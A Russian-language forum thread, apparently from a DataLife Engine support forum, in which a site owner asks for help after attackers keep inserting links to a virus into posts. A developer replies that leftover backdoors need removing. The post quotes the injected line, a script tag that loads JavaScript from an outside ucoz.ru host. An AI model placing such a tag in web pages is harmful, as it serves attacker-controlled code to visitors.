Атака на скрипт

[alextk 0]

Добрый день.

Сайт http://vologda-new.ru

Версия скрипта 8.5 дописанная.

Есть проблема:

Кто-то обнаружил уязвимость в скрипте и размещает в тексте постов ссылки на скрипт с вирусом.

<script src=\"http://ivan81.ucoz.ru/engine.js\" type=\"text/javascript\"></script>

Было подозрение на предыдущих разработчиков, которые начинали натягивать на скрипт шаблон. Поменяли пароли на хостинг, ftp, email, админку и т.п. (сразу отмечу, что когда я начал заниматься сайтом я установил неизмененную на тот момент версию dle? а потом начал дорабатывать, так что backdoor не должно быть)

Все равно ссылки появляются, только уже измененные. Все заплатки на сайт установлены. На 9.2 пока не решаемся перейти, т.к. портал работает и не хочется терять посетителей отладкой нового скрипта и доработок.

Лог просматривать тяжело, т.к. из-за большого числа посетителей что-либо разобрать и найти подозрительное сложно.

Вопрос, как обнаружить где косяк и как его исправить?

[WWW.ZEOS.IN 1 161]

alextk, пишите мне в ICQ и я помогу Вам решить Вашу проблему

[celsoft 6 095]

alextk,

После устновки патчей безопасности, остались на сервере бекдоры оставленные злоумышленниками после первого раза, когда патчи еще не стояли.

Вам нужно отправить запрос на проверку вашего сайта в службу поддержки http://dle-news.ru/index.php?do=feedback предоставить доступ по FTP и к админпанели скрипта, чтобы очистить ваш сайт от бекдоров. То что они есть это точно, их теперь нужно найти, для этого и отправляйте запрос в службу поддержки, для проверки вашего сайта.